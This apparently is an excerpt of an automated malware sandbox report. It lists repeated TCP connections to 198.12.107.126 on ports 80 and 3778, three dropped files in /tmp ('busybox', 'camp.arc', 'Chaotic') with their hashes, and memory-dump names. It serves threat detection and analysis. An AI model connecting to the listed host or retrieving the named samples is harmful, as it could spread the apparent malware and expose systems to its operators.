| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | tcp | |
| US | 198.12.107.126:3778 | tcp |
Files
/tmp/busybox
| MD5 | b4dede5fc0b1bad5cb8e901bde126b97 |
| SHA1 | 10cbe9a418ad84a1ed297948539d37aeb58dd810 |
| SHA256 | a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020 |
| SHA512 | 45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6 |
/tmp/camp.arc
| MD5 | 36a7a1e959eaf7d6896505777912ecdf |
| SHA1 | 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919 |
| SHA256 | 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca |
| SHA512 | 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0 |
/tmp/Chaotic
| MD5 | dac9f1dcafdb77db0d0ff1be1e704b1e |
| SHA1 | e83605a050e0aaad3dba360545a00036f083eb91 |
| SHA256 | 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d |
| SHA512 | e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571 |
memory/1507-1-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1517-2-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1527-3-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1537-4-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1547-5-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1559-6-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1569-7-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1579-8-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1589-9-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1599-10-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1609-11-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1619-12-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1629-13-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1639-14-0x0000000008048000-0x000000000805bc40-memory.dmp